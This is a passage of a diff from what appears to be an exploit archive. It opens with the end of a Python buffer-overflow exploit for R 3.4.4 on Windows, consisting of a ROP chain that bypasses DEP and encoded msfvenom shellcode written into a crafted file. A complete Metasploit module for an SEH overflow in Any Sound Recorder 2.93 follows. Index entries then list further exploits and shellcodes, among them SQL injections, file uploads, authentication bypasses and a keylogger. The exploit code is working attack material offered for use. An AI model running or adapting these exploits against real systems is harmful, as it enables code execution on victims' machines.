+rop += struct.pack("L", 0x6ca57139)  # XCHG EAX,ESI # RETN [R.dll] 
+rop += struct.pack("L", 0x6bed7b2a)  # POP EBP # RETN [Rlapack.dll] 
+rop += struct.pack("L", 0x6ca2a9bd)  # & jmp esp [R.dll]
+rop += struct.pack("L", 0x6cbef3c0)  # POP EAX # RETN [R.dll] 
+rop += struct.pack("L", 0xffffffff)  # Value to negate, will become 0x00000001
+rop += struct.pack("L", 0x6397474a)  # NEG EAX # RETN [graphics.dll] 
+rop += struct.pack("L", 0x6c94e84f)  # XCHG EAX,EBX # RETN [R.dll] 
+rop += struct.pack("L", 0x6cbef3e4)  # POP EAX # RETN [R.dll] 
+rop += struct.pack("L", 0xe7bf59f1)  # put delta into eax (-> put 0x00001000 into edx)
+rop += struct.pack("L", 0x6fed580f)  # ADD EAX,1840B60F # RETN [grDevices.dll] 
+rop += struct.pack("L", 0x6ca3485a)  # XCHG EAX,EDX # RETN [R.dll] 
+rop += struct.pack("L", 0x63760b48)  # POP ECX # RETN [Rgraphapp.dll] 
+rop += struct.pack("L", 0xffffffc0)  # Value to negate, will become 0x00000040
+rop += struct.pack("L", 0x71364d80)  # NEG ECX # RETN [stats.dll] 
+rop += struct.pack("L", 0x6fed44a0)  # POP EDI # RETN [grDevices.dll] 
+rop += struct.pack("L", 0x6375fe5c)  # RETN (ROP NOP) [Rgraphapp.dll]
+rop += struct.pack("L", 0x6c998dce)  # POP EAX # RETN [R.dll] 
+rop += struct.pack("L", 0x90909090)  # nop
+rop += struct.pack("L", 0x7135a86c)  # PUSHAD # RETN [stats.dll] 
+
+
+nop = "A" * 20
+
+# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' cmd=calc.exe exitfunc=thread -f python
+
+boom =  ""
+boom += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+boom += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+boom += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+boom += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+boom += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+boom += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+boom += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+boom += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+boom += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+boom += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+boom += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+boom += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+boom += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+boom += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+boom += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+boom += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+boom += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+
+
+
+end = "\xCC" * 588
+
+poc = pad + rop + nop + boom + end
+
+file = open("boom.txt", "w")
+file.write(poc)
+file.close
+print "<3"

exploits/windows/local/45744.rb

@@ -0,0 +1,72 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'    => 'Any Sound Recorder 2.93 Buffer Overflow (SEH)',
+      'Description'  => %q{
+          This module exploits a stack based buffer overflow in Any Sound Recorder 2.93, when
+          with the name "hack.txt". Copy the content of the  "hack.txt",Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register"
+      },
+      'License'    => MSF_LICENSE,
+      'Author'    =>
+        [
+          'Abdullah Alıç',            # Original discovery
+          'd3ckx1 d3ck(at)qq.com',       # MSF module
+        ],
+      'References'  =>
+        [
+          [ 'OSVDB', '' ],
+          [ 'EBD', '45627' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process'
+        },
+      'Platform'  => 'win',
+      'Payload'   =>
+        {
+          'BadChars'    => "\x00\x0a\x0d",
+          'DisableNops' => true,
+          'Space'       => 10000
+        },
+      'Targets'   =>
+        [
+          [ 'Any Sound Recorder 2.93',
+            {
+              'Ret'     =>  0x72d12f35, # 0x72d12f35 : P/P/R FROM msacm32.drv form winxp sp3
+              'Offset'  =>  900
+            }
+          ],
+        ],
+      'Privileged'  => false,
+      'DisclosureDate'  => 'Oct 25 2018',
+      'DefaultTarget'  => 0))
+
+    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.txt']),], self.class)
+
+  end
+
+  def exploit
+    buf = "\x90"*(target['Offset'])
+    buf << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # nseh (jmp to payload)
+    buf << [target.ret] .pack('V')  # seh
+    buf << make_nops(10)
+    buf << payload.encoded
+    buf << "\x90" * 200
+
+    file_create(buf)
+    handler
+    
+  end
+end

files_exploits.csv

@@ -6165,6 +6165,9 @@ id,file,description,date,author,type,platform,port
 45715,exploits/linux/dos/45715.txt,"systemd - chown_one() can Dereference Symlinks",2018-10-29,"Google Security Research",dos,linux,
 45716,exploits/windows/dos/45716.txt,"ASRock Drivers - Privilege Escalation",2018-10-29,SecureAuth,dos,windows,
 45732,exploits/windows/dos/45732.txt,"Modbus Slave 7.0.0 - Denial of Service (PoC)",2018-10-29,"Ihsan Sencan",dos,windows,
+45746,exploits/hardware/dos/45746.php,"ZyXEL VMG3312-B10B < 1.00(AAPP.7) - Credential Disclosure",2018-10-30,"numan türle",dos,hardware,21
+45749,exploits/windows/dos/45749.py,"QNAP NetBak Replicator 4.5.6.0607 - Denial of Service (PoC)",2018-10-30,"Yair Rodríguez Aparicio",dos,windows,
+45750,exploits/linux/dos/45750.txt,"SIPp 3.3.990 - Local Buffer Overflow (PoC)",2018-10-30,"Nawaf Alkeraithe",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10063,6 +10066,9 @@ id,file,description,date,author,type,platform,port
 45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple,
 45709,exploits/windows_x86-64/local/45709.vb,"School Equipment Monitoring System 1.0 - 'login' SQL Injection",2018-10-29,"Ihsan Sencan",local,windows_x86-64,
 45710,exploits/windows_x86/local/45710.pl,"Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)",2018-10-29,"Kağan Çapar",local,windows_x86,
+45738,exploits/windows/local/45738.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)",2018-10-30,"Charles Truscott",local,windows,
+45742,exploits/openbsd/local/45742.sh,"xorg-x11-server 1.20.3 - Privilege Escalation",2018-10-30,"Marco Ivaldi",local,openbsd,
+45744,exploits/windows/local/45744.rb,"Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)",2018-10-30,d3ckx1,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16907,6 +16913,7 @@ id,file,description,date,author,type,platform,port
 45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux,25
 45695,exploits/windows/remote/45695.rb,"WebExec - Authenticated User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows,
 45712,exploits/linux/remote/45712.py,"Paramiko 2.4.1 - Authentication Bypass",2018-10-29,"Adam Brown",remote,linux,
+45748,exploits/multiple/remote/45748.py,"Nutanix AOS & Prism < 5.5.5 (LTS) / < 5.8.1 (STS) - SFTP Authentication Bypass",2018-10-30,"Adam Brown",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40247,3 +40254,16 @@ id,file,description,date,author,type,platform,port
 45733,exploits/php/webapps/45733.txt,"SaltOS Erp Crm 3.1 r8126 - SQL Injection (2)",2018-10-29,"Ihsan Sencan",webapps,php,80
 45734,exploits/php/webapps/45734.txt,"SaltOS Erp Crm 3.1 r8126 - Database File Download",2018-10-29,"Ihsan Sencan",webapps,php,80
 45735,exploits/php/webapps/45735.txt,"K-iwi Framework 1775 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
+45736,exploits/php/webapps/45736.txt,"South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
+45737,exploits/php/webapps/45737.txt,"Electricks eCommerce 1.0 - 'prodid' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
+45739,exploits/php/webapps/45739.txt,"phptpoint Pharmacy Management System 1.0 - 'username' SQL Injection",2018-10-30,"Boumediene KADDOUR",webapps,php,80
+45740,exploits/php/webapps/45740.txt,"Webiness Inventory 2.9 - Arbitrary File Upload",2018-10-30,"Boumediene KADDOUR",webapps,php,80
+45741,exploits/hardware/webapps/45741.txt,"NETGEAR WiFi Router R6120 - Credential Disclosure",2018-10-30,Wadeek,webapps,hardware,80
+45747,exploits/php/webapps/45747.txt,"MyBB Downloads 2.0.3 - SQL Injection",2018-10-30,"Lucian Ioan Nitescu",webapps,php,80
+45751,exploits/php/webapps/45751.txt,"Expense Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
+45752,exploits/php/webapps/45752.txt,"University Application System 1.0 - SQL Injection / Cross-Site Request Forgery (Add Admin)",2018-10-30,"Ihsan Sencan",webapps,php,80
+45753,exploits/php/webapps/45753.txt,"Notes Manager 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
+45754,exploits/php/webapps/45754.txt,"Instagram Clone 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
+45755,exploits/jsp/webapps/45755.txt,"Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal",2018-10-30,"Rafael Pedrero",webapps,jsp,80
+45756,exploits/php/webapps/45756.txt,"Asaancart Simple PHP Shopping Cart 0.9 - Arbitrary File Upload / SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
+45757,exploits/php/webapps/45757.txt,"CI User Login and Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80

files_shellcodes.csv

@@ -921,3 +921,4 @@ id,file,description,date,author,type,platform
 45538,shellcodes/linux_x86/45538.txt,"Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes)",2018-10-08,"Kartik Durg",shellcode,linux_x86
 45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips
 45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86
+45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64